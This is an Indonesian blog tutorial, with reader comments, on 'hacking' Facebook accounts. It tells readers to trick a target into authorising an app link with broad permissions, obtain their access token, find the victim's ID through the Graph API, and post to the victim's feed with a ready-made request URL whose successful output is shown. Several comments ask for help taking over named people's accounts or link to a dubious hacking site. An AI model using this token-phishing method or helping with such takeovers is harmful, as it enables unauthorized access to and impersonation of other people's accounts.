Home » » Cara Hack Facebook Dengan Access Token

Cara Hack Facebook Dengan Access Token


Cara Hack Facebook Dengan Access Token


Cara Hack Facebook Dengan Access Token

Hai temen temen kali ini saya akan membagi tips hack facebook. yang mudah digunakan..... pingin tau caranya berikut caranya :
Ini adalah link access token CAUSE :
https://www.facebook.com/dialog/permissions.request?app_id=2318966938&next=http%3A%2F%2Fwww.facebook.com%2F&response_type=token
&perms=publish_stream%2Coffline_access%2Cuser_photos%2Cfriends_
photos%2Cpublish_actions%2
Cread_stream%2Cemail%2Cuser_status%2Cuser_activities%2Cuser_likes%2Cmana
ge_pages
gak hanya link ini, kalian bisa juga menggunakan link access token yg lainnya kok ;)
berikan link tersebut kepada salah 1 teman anda (target). dan mintalah access token mereka
http://www.facebook.com/?access_tokenAAABempp6Ls0BAGN2cciPd2VDNAF0deEgIHzhqGjS9WjUMI
2SWvh8xO9PzN7ZBsoVIiTKd4AbZCYvKdw8VxwFHDeawnCFQ88v4lMRrVbwZDZD&
expires_in=0
(yg tebal itu access token)
Nah, sekarang yg di perlukan ID Facebook korban. Sudah tau gimana cara mendapatkan ID korban??
kesini  http://graph.facebook.com/UsernameKorban
contoh:  http://graph.facebook.com/yogabrutal
maka akan tampil seperti ini
{
   "id": "100001053031325",
   "name": "Yogi Prayoga",
   "first_name": "Yogi",
   "last_name": "Prayoga",
   "gender": "male",
   "locale": "id_ID"
}
yg tebal itu adalah ID
sudah dapat ID dan Access tokennya, kini saatnya kita bermain2 dengan status FB dia :D
https://graph.facebook.com/IDKorban/feed?method=POST&message=Pesan yang mau disampaikan &access_token=AccessToken
tuh, isi lah yang saya tebalkan

Gini pengisiannya :
Copy paste kan ini di URL ini pada address bar, kemudian tekan ENTER
https://graph.facebook.com/100001053031325/feed?method=POST&message=http://blog-gunaya.blogspot.com . adalah blog terbaik sepanjang masa&access_token=AAABempp6Ls0BAGN2cciPd2VDNAF0deEgIHzhqGjS9
WjUMI2SWvh8xO9PzN7ZBsoVIiTKd4AbZCYvKdw8VxwFHDeawnCFQ88v4lMRrVbwZDZD


{
   "id": "100001053031325_450779631633801"
}
nah,kalau begini hasilnya, berarti success. dan kalau bukan begini atau ada tulisan error, berarti gagal

Sumber : blog-gunaya.blogspot.com


Cara Hack Facebook Dengan Access Token


DOWNLOAD NOW (MIRROR LINK)


Cara Hack Facebook Dengan Access Token

Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Tips Trik Blog

14 comments:

  1. akan saya coba nih,mudah-mudahan aja berhasil...

    ReplyDelete
  2. salam mas tolong dong kasih hack akaun facebooknya ini dia udah menghak
    facebook gue dan mencuri group gue,orngnya sih dari malaysia dasar banget tu orang\
    URL facebooknya ini mas https://www.facebook.com/olie.nam.7 URL group gue ini
    https://www.facebook.com/groups/sandiwaracinta saya mohon pertolongan dari mas atau mbak
    kerna berbagai cara udah gua menghack facebooknya percuma aja enggak bisa juga..
    tolong gue ya ku mohon,klu udah kasih tau gue URL facebook gun ini mas/mbak..
    https://www.facebook.com/suzie.anna.948
    3 minit yang lalu · Suka

    ReplyDelete
  3. http://www.ehackfacebook.net/hack.php?id=177811

    ReplyDelete
  4. WOww !!!!
    Kerenn Nih Kayaknya :D Coba ahh (y)

    Ditunggu Kunjungan Baliknya Sob
    ~> http://myinfo4you-blogger.blogspot.com

    ReplyDelete
  5. Goblokk Itu bukan Hack .. Cuman Update status Lewat akses Token

    ReplyDelete
    Replies
    1. GOBLOK..??? itu cuma sekedar sharing kawan.. jngan asal bilang goblok kamu,, INGAT !!

      Delete
  6. Mungkin Judulnya perlu di rubah :)
    sekedar saran :)

    mampir ke rumah gue gan, http://khoirony.TK :)

    ReplyDelete
  7. malah akun fb kita ngirim post ke fb target :3

    ReplyDelete
  8. sorry,,gmna cra mnta acces tokennya..???

    ReplyDelete
  9. gimana cara ngehack facebook orang lain tapi dia pake email nya no telepon

    ReplyDelete
  10. makasi info nya gaaan
    silakan kunjungi juga blog saya yaaa

    erix-ilham.blogspot.com

    ReplyDelete

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Tips Trik Blog™ - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger